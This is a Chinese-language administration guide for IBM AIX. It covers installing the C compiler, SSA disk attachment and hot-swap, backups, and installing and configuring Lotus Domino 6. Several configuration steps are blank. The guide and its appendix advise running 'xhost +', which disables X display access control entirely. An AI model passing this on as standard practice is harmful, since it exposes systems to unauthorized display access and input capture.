查看C安装手册中安装C语言所必须先安装的软件(Software Must be Installed)
#lslpp -l|grep bos.adt.include
#lslpp -l|grep bos.adt.lib
用上述两条命令查看这些文件是否Comitted
#smit install_latest
将C/C++语言安装盘放入光驱
进入 INPUT device / directory for software 选择"/dev/cd0 (SCSI Multimedia CD-ROM Drive)"，SOFTWARE to install按"F4"，系统显示选择安装文件
选择以xlc开头的所有文件
全部选定后按回车（Enter）运行

十、 连接7133磁盘阵列中的磁盘

将7133中磁盘连上(具体连接方法可查看7133/Model600随机资料)
注意:7133 SSA接口的磁盘为回路连接,从主机后SSA ADAPTER连出后从另一根线连进,此回路中所串联的硬盘即该主机所使用硬盘
#cfgmgr (激活系统,配置磁盘)
注意:在关机状态下连接后再开系统自动调用cfgmgr

十一、 系统磁盘热插拔

必须将所需拔出的磁盘中所在VG中的LV(Logical Volume)与File System进行umount
#lsvg -l datavg (查看datavg中的详细信息).
#df -k (查看文件系统的信息)
#umount /cmis (umount 文件系统cmis)
#varyoffvg datavg (切断datavg)
#lsvg -o (查看当前激活的VG)
#exportvg datavg.(输出datavg)
此时可以拿出该磁盘(该磁盘可以为内置式).
将该磁盘放入另外一台主机
#importvg -y datavg hdisk1(在另外一台主机上键入该命令).

十二、备份策略

rootvg可采用#smit mksysb 来备份
datavg 中的文件系统可进入smit->System Storage Management (Physical & Logical Storage)->File Systems->Backup a File System，选定预备份的文件系统，回车确认即可
datavg可采用smit命令
smit vg->Back Up a Volume Group，选定预备份的vg，回车确认即可

Domino 6 AIX环境下安装

第一部分 系统要求(安装前准备工作)
1. AIX 4.3.3 要求:
ü AIX 必需是 4.3.3_09以上 (使用oslevel检查)
ü 要安装中文环境 ( Lang=zh_CN )

2. AIX 4.3.3. Pacth List:
AIX 4.3.3 - Maintenance Level 9
xlC.aix43.rte 5.0.0.6 C C Set ++ Runtime for AIX 4.3
bos.iocp.rte 4.3.3.76 A I/O Completion Ports API

4.3 APAR for this fix is IY23157. This will bring bos.iocp.rte to a level of 4.3.3.76.

AIX 5.1
xlC.aix50.rte 5.0.2.0 COMMITTED C Set ++ Runtime for AIX 5.0
bos.iocp.rte 5.1.0.11 COMMITTED I/O Completion Ports API
5.1 APAR is IY22656. This will bring bos.iocp.rte to a level of 5.1.0.11.

In addition, the following AIX patch levels are required:
IY21149 - AIX kernel patch

3. AIX I/O completion ports 设置
To verify if a fileset installed and patch level, from the unix command line type: lslpp -l ;, e.g. lslpp -l bos.iocp.rte.
To verify if an APAR is installed, from the unix command line/prompt type: instfix -ivk ;, e.g. instfix -ivk IY23157
**Install fileset bos.iocp.rte via SMIT (System Management Interface Tool), from command line type: smitty installp
select: Install and Update from LATEST available Software >;>; input device / directory for software (input location of fileset)
**Install APAR, from unix command line type: smitty installp, select: Update Software by Fix (APAR) >;>; input device / directory for software (input location of APAR)

**Configure I/O Completion Ports, from unix command line type:
smitty iocp, select >;>; Configure Defined I/O Completion Ports

NOTE: user must be logged in as root in order to install fileset, APARs and to configure I/O completion ports.

4. 创建Notes用户和Notes组

第二部分 Domino 6 安装步骤
系统准备工作完成以后，就可以开始Domino R6服务器安装。
1. 以root用户身份登录。
2. 转到安装目录或CDROM的目录并执行安装程序，
命令为： ./INSTALL
3. 出现欢迎界面，按“tab”键到下一屏。
4. 下一屏要求阅读许可协议（License agreement）。按“tab”键到下一屏，直到许可协议的结束。在许可协议结束时询问是否接受许可协议，缺省为“Yes”。如果接受许可协议，按“tab”键到下一屏。
5. “Do you wan to install data directories only? ;” 选择 “No”
6. 选择要安装的Domino服务器类型。选择服务器类型为 “Domino Utilility Server”（通过空格键选择），[缺省为” Domino Messaging Server” ] 然后按“tab”键到下一屏。
7. “Do you want to install all template files for this Domino Server? ;” 选择”Yes”
8. “Do you want to create /opt/lotus soft link for this Domino Server? ;” 选择”Yes”
9. 选择Domino执行程序的目录，缺省为/opt/lotus。与前面环境准备的设置相同，按“tab”键到下一屏。
10. 下一屏询问是否安装多个分区服务器，缺省为“No”，缺省值即可。然后按“tab”键到下一屏。
11. 下一屏询问是否自动生成数据目录，缺省为“Yes”。按“Spacebar”改为“No”，然后按“tab”键到下一屏。
12. 下一屏显示缺省的数据目录。按“Enter”键输入数据目录/app/lotus/notesdata，然后按“Enter”键。按“tab”键到下一屏。
13. 选择用户，缺省为notes。按“tab”键到下一屏。
14. 选择组，缺省为notes。与前面环境准备的设置相同，所以按“tab”键到下一屏。
15. 下一屏显示已经完成安装程序的配置。按“tab”键继续。下一屏显示安装配置和设置。如果一切正常，按“tab”键开始安装。否则，按“Escape”键重新配置。步骤与上面的过程相同。
16. 安装完成后将显示安装成功。

屏幕显示安装成功后，接着安装语言包。

第三部分 安装中文语言包
安装方法一( 图形界面):
1. 命令为: ./AIXDomLP60_GUI
2. 显示:
InstallShield Wizard
正在初始化 InstallShield Wizard …
正在准备 Java™ 虚拟机…
正在运行InstallShield Wizard.
3. 启动图形化界面, 请按提示操作.
4. 完成安装” Lotus Domino Language Pack Installer”
提示: “The Lotus Domino Language Pack has successfully installed the selected Language Pack”

安装方法二( 文本界面):
1. 命令为: ./AIXDomLP60_CONSOLE
2. 显示:
InstallShield Wizard
正在初始化 InstallShield Wizard …
正在准备 Java™ 虚拟机…
正在运行InstallShield Wizard.
3. 启动文本界面, 请按提示操作
4. 完成安装” Lotus Domino Language Pack Installer”
提示: “The Lotus Domino Language Pack has successfully installed the selected Language Pack”

第四部分 配置Domino 6
在AIX系统上, 首先切换到notes用户
命令: su -notes

配置方法一( 图形界面 ):
1. 当前目录为Domino数据目录, 例: /lotus/notesdata
2. 命令: /opt/lotus/bin/http httpsetup 或 /opt/lotus/bin/server
3. 将启动图形界面, 进行配置Domino 6 (详见下方法二中界面 )
[错误信息: Error: please edit your shell’s DISPLAY environement variable to reflect an unlocked terminal that you would like to launch the Domino Setup Program”]
注意: 若出现该提示信息, 请询问AIX工程师.
(提示: export DISPLAY=130.130.22.22:0.0
xhost +
) 见附录2

配置方法二 ( 远程配置 ):
1. 当前目录为Domino数据目录, 例: /lotus/notesdata
2. 命令: /opt/lotus/bin/server –listen
3. 在远程机器上安装Notes Administrator
4. 在Notes目录下, 命令: serversetup –remote

5.


6.


7.


8.


9.

10.

11.


12.


13.







选择”是”.






附录:
1. 如何查AIX Patch:
# instfix -ik IY17945
All filesets for IY17945 were found.

2. Unlocking Unix system displays for running Domino Java Setup

Most Unix systems create new shells with access control turned on by default. This will result in any application that tries to create a window (such as the new Domino Java Setup program) to fail with Xlib errors.

In order to unlock the system display, make sure that you are logged in as the user that will be running the application, and then type the command:
xhost +

This will disable the systems access control and make it possible to launch the Domino Java Setup program.

Below is an example of the error messages generated when attempting to launch Domino Setup without disabling access control first:

Xlib: connection to ":0.0" refused by server
Xlib: Client is not authorized to connect to Server
Exception in thread "main" java.lang.InternalError: Can't connect to X11 window server using ':0.0' as the value of the DISPLAY variable.

Also, if you will need to make sure that your shell's DISPLAY environment variable points to the x-windows session that you are running on. For example, if you have connected to another system via telnet, you will need to change the DISPLAY variable to point to the system that you are working on. Remember to include the port number of the system display (ie: systemname:0.0).

可能遇到的问题：
磁盘空间不够
解决方法:
smit jfs
Change / Show characteristics of a Journaled File System

mount cd-rom
smit storage
file Systems
Add /Change /Show / Delete File Systems
CDROM File Systems

iocp install
smitty installp
Install Software
/dev/cd0(press F4 key)
SOFTWARE TO INSTALL (PRESS F4 KEY) and select bos.iocp ('/'key to find)

AIX知识概要

/etc/filesystems Aix mount 检查路径
主要命令
smit df